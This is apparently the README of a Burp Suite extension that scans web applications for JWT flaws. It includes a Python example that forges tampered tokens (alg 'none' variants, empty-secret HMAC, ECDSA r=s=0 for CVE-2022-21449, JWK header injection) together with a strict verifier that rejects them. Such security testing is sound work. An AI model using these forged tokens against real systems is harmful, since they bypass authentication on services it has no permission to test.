CompassSecurity/jwt-scanner
JWT-scanner - Burp Extension

Description

JWT Scanner is a Burp Suite extension for automated testing of JSON Web Token (JWT) implementations in web applications.

Checks

  • Signature presence (token accepted without a signature segment)
  • Invalid signatures (token accepted with a tampered signature)
  • Signatures created with an empty secret (HMAC with a zero-length key)
  • Usage of "alg": "none" and its case variations
  • Invalid ECDSA parameters, i.e. signatures with r = s = 0 (CVE-2022-21449)
  • JWT JWK injection (server trusts a key embedded in the token header)
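To make the checks above concrete, the following added example (not code from the jwt-scanner project) builds the tampered tokens a scanner of this kind sends from one valid HS256 token, and pairs them with a strict verifier that rejects every one of them. The secret, the claims and the attacker key are constructed for the example; the JWK injection is shown in its symmetric ("oct") form because generating an RSA key needs a third-party library, and the ECDSA case produces the zero r/s signature bytes without needing an EC key at all.

```python
"""Tamper variants for the checks listed above, plus a verifier that rejects them.
Added example; not the jwt-scanner project's own code."""
import base64
import binascii
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = f"{encode_segment(header)}.{encode_segment(payload)}"
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


# Constructed sample material; not a real secret or real claims.
SECRET = b"example-server-secret"
VALID_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                         {"sub": "alice", "admin": False}, SECRET)

NONE_VARIANTS = ["none", "None", "NONE", "nOnE"]


def generate_variants(token: str) -> dict:
    """Return {check_name: mutated_token}. The payload is left unchanged: the
    question is only whether the server accepts a token it should reject."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    variants = {}

    # Signature presence: keep header and payload, send an empty signature segment.
    variants["signature_missing"] = f"{header_b64}.{payload_b64}."

    # Invalid signature: flip every bit of the genuine signature.
    bad_sig = bytes(b ^ 0xFF for b in b64url_decode(sig_b64))
    variants["signature_invalid"] = f"{header_b64}.{payload_b64}.{b64url_encode(bad_sig)}"

    # Empty secret: re-sign with HS256 and a zero-length key.
    variants["empty_secret"] = sign_hs256(dict(header, alg="HS256"), payload, b"")

    # alg none in several spellings, with and without a trailing dot.
    for alg in NONE_VARIANTS:
        body = f"{encode_segment(dict(header, alg=alg))}.{payload_b64}"
        variants[f"alg_{alg}"] = body + "."
        variants[f"alg_{alg}_nodot"] = body

    # CVE-2022-21449: ES256 signature with r = s = 0, i.e. 64 zero bytes in JWS form.
    variants["ecdsa_zero_rs"] = (f"{encode_segment(dict(header, alg='ES256'))}."
                                 f"{payload_b64}.{b64url_encode(bytes(64))}")

    # JWK injection (symmetric form): embed an attacker-chosen key in the header
    # and sign with it; a server that resolves the key from 'jwk' will accept it.
    attacker_key = b"attacker-chosen-key"  # constructed
    jwk_header = dict(header, alg="HS256",
                      jwk={"kty": "oct", "k": b64url_encode(attacker_key)})
    variants["jwk_injection"] = sign_hs256(jwk_header, payload, attacker_key)
    return variants


def verify_hs256(token: str, secret: bytes) -> bool:
    """Strict verifier: exactly three segments, non-empty signature, exact
    case-sensitive alg match, server-side key only (header 'jwk' is ignored),
    constant-time comparison. Refuses to run with an empty secret."""
    if not secret:
        raise ValueError("refusing to verify with an empty secret")
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return False
    try:
        header = json.loads(b64url_decode(parts[0]))
        provided = b64url_decode(parts[2])
    except (ValueError, binascii.Error):
        return False
    if header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret, f"{parts[0]}.{parts[1]}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, provided)


if __name__ == "__main__":
    for name, tok in generate_variants(VALID_TOKEN).items():
        print(f"{name:24s} accepted={verify_hs256(tok, SECRET)}")
```

Each variant is what an issue in the scanner's report corresponds to: if the application answers one of them with the same HTTP 200 it gives the genuine token, that check has failed. The verifier shows the properties a correct implementation needs (an explicit algorithm allow-list, a key that comes from server configuration rather than the token, and a required signature segment); a library that takes the algorithm from the header, or that looks up keys via the embedded `jwk`, accepts several of these variants.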

Features

  • Select a base request and let the extension autodetect the JWT
  • Manually select the target JWT in the source request

Usage

Run an active scan, or manually select a request to check:

  1. Go to Proxy / Repeater / Target / Logger / Intruder
  2. Select a request that requires authentication with a valid JWT and returns an HTTP 200 response

NOTE: The extension first resends the selected request without modification and checks that the JWT is still accepted. If it is not, an error is displayed in the Event Log, since the results of the checks would otherwise be meaningless (a rejected variant could not be distinguished from an expired or revoked token).

Automatically detect JWT

  1. Right-click the request you want to check.
  2. Extension -> JWT-scanner -> Autodetect JWT
  3. If a vulnerability is identified, an issue is generated.

Autodetect JWT from valid request: img.png

Manually select JWT

  1. Highlight the target JWT in the request.
  2. Right-click the highlighted JWT.
  3. Extension -> JWT-scanner -> Selected JWT
  4. If a vulnerability is identified, an issue is generated.

Installation

  1. Download the latest pre-built jar file from the releases page.
  2. Extender -> Installed tab -> Add -> Extension Details -> Extension Type: Java -> Select file ...
  3. Select the downloaded jar.

Manually select JWT from valid request: img_1.png

Build

Use Maven to build the jar file with dependencies:

mvn package -f pom.xml